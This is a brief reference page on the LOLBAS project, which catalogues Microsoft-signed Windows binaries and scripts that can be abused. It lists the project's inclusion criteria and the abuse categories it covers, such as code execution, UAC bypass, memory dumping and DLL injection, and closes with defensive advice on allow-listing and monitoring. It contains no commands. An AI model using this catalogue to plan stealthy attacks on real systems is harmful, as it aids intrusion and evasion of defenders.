LOLBAS project¶

LOLBAS stands for Living Off the Land Binaries And Scripts, a project’s primary main goal is to gather and document the Microsoft-signed and built-in tools used as Living Off the Land techniques, including binaries, scripts, and libraries.

The criteria for a tool to be considered a “Living Off the Land” technique and accepted as part of the LOLBAS project:

• Microsoft-signed file native to the OS or downloaded from Microsoft.

• Having additional interesting unintended functionality not covered by known use cases.

• Benefits an APT (Advanced Persistent Threat) or Red Team engagement.

The LOLBAS project accepts tool submissions that fit one of the following functionalities:

• Arbitrary code execution

• File operations, including downloading, uploading, and copying files.

• Compiling code

• Persistence, including hiding data in Alternate Data Streams (ADS) or executing at logon.

• UAC bypass

• Dumping process memory

• DLL injection

Resources¶

• LOLBAS site

Counter moves¶

LOLBAS catalogues the trusted binaries attackers reuse, which is just as useful to defenders. Allow-listing and command-line monitoring of these binaries are the answer. Seen from the other side, this sits in the blue notes on plausibility as cover.